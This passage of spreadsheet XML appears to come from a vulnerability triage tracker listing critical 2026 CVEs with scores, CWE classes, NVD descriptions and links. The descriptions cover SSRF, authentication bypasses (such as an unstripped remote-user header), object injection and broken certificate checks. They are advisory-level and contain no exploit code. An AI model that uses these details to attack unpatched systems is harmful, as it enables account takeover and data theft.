      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97248</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Booking Activities &lt;= 1.18.7.1 versions.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97248</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102149</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway did not sufficiently restrict which account a certificate could be assigned to. This could allow an attacker to associate a certificate with another user's account, affecting the confidentiality and integrity of that account's encrypted mail and, where certificate-based login is enabled, potentially permitting unauthorized access to the account.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102149</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55181</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>docker, gin</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.3, Tugtainer's OIDC authentication can still be initiated even when OIDC_ENABLED=false. The /auth/oidc/enabled endpoint correctly reports that OIDC is disabled. However, a direct request to /auth/oidc/login still starts the OIDC login flow, returns HTTP 302, sets an oidc_state cookie, and redirects the user to the configured OIDC authorization endpoint. This bypasses the intended OIDC disable switch. This issue has been patched in version 1.30.3.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55181</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103475</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 exposes the Yii debug and Gii modules to all IP addresses by setting allowedIPs to ['*'] in its default development configuration. Unauthenticated remote attackers can access the debug endpoint to read sensitive data including session cookies and database queries, or access the Gii endpoint to generate and write PHP files into the application directory.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103475</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74864</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>nginx, go, gin</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter that forces the request with HTTP header "x-webobjects-remote-user" to be treated as sent by a verified user without performing password validation. Since Nginx does not strip this header, any client can supply it arbitrarily and gain access as any user, including a privileged user, without providing a password.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74864</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102508</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347, CWE-757</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Cryptographic Signature and Improper Certificate Validation in the OPC UA driver of Apache PLC4X (PLC4J) allows an attacker in a network position between client and server to impersonate the OPC UA server and to read, forge or modify secure-channel traffic, including user credential ssent by the client.
The defect manifests differently depending on the version:
- In 0.9.0 through 0.11.0 a failed message-signature check is only logged and never enforced, and there is no mechanism to verify the server certificate: it is taken from the unauthenticated GetEndpoints discovery response and used to encrypt the user's password.
- In 0.12.0 through 0.13.1 the signature check is inverted (valid signatures are rejected, invalid ones accepted), and server certificates are accepted without a trust anchor by default.
- In all affected versions the default security policy is None. Starting with 0.12.0 the driver additionally continues silently at a weaker security policy than the one configured, and starting with 0.13.0 endpoint selection prefers the weakest matching endpoint.
Users checking only for one of these mechanisms may wrongly conclude they are unaffected.
This issue affects Apache PLC4X: from 0.9.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 verifies message signatures correctly, refuses to connect unless the server certificate can be verified against a configured trust store or pinned certificate, defaults to Basic256Sha256 with SignAndEncrypt, and fails the
connection if the negotiated security policy is weaker than the configured one.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102508</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102992</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>piscina is a node.js worker pool implementation. Prior to 4.9.4, 5.3.2, and 6.0.0-rc.5, Piscina stores ThreadPool.options in src/index.ts as a plain object that inherits from Object.prototype. Applications with a separate prototype-pollution primitive can therefore supply inherited values for security-sensitive options that do not have own defaults. An inherited execArgv value is passed to the Node.js Worker constructor and can preload attacker-controlled code in worker threads, an inherited loadBalancer function can execute during task scheduling, and inherited env values can alter worker environments. This issue is fixed in versions 4.9.4, 5.3.2, and 6.0.0-rc.5.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102992</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19445</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>A remote, unauthenticated TLS client can make a server crash or call
through a freed pointer if its sni_callback assigns a different context to
SSLSocket.context (the documented way to select a certificate per server
name) and nothing else keeps the original ssl.SSLContext alive. Typical
cases are servers that create an SSLContext per connection or replace it
while connections are open; servers that wrap their listening socket with
it are not affected.
Mitigation: keep a reference to every SSLContext that sets sni_callback for
the lifetime of the server. TLS clients are not affected.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19445</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74865</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter "SOGoTrustProxyAuthentication=YES". This causes the password to be bypassed during HTTP Basic authentication. An unauthenticated attacker who provides the username of an existing user and any arbitrary password can successfully log in to that user's account.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74865</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102095</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Server-Side Request Forgery. Kiteworks Email Protection Gateway performed server-side fetches of URLs contained in the message content it processed, without adequately restricting the fetch destination. A remote, unauthenticated sender could craft a message that caused the gateway to issue requests to internal services and cloud instance metadata endpoints and return the responses, potentially disclosing sensitive internal data and, depending on the internal service reached, affecting its state.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102095</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102102</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S17"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an issuer certificate in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102102</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102103</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S18"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retrieves a certificate revocation list in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102103</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102104</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S19"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performs an online certificate status check for an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102104</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102105</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Server-Side Request Forgery (SSRF). A server-side request forgery (SSRF) weakness in Kiteworks Email Protection Gateway could allow a remote, unauthenticated attacker to induce the gateway to issue crafted requests to internal or otherwise unintended network destinations. The requests are triggered while the gateway renders message content that references external resources. Depending on the services reachable from the gateway, this could disclose sensitive internal information or trigger unintended actions on internal systems.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102105</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62308</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>docker, requests</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.6, Tugtainer allows an authenticated user to make the backend server send outbound HTTP requests to arbitrary user-supplied URLs through the notification test endpoint. The /settings/test_notification endpoint accepts a urls field and passes it directly to Apprise without restricting protocols, hostnames, localhost addresses, private IP ranges, or cloud metadata addresses. This can be abused as an authenticated blind server-side request forgery (SSRF). This issue has been patched in version 1.30.6.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62308</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87830</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
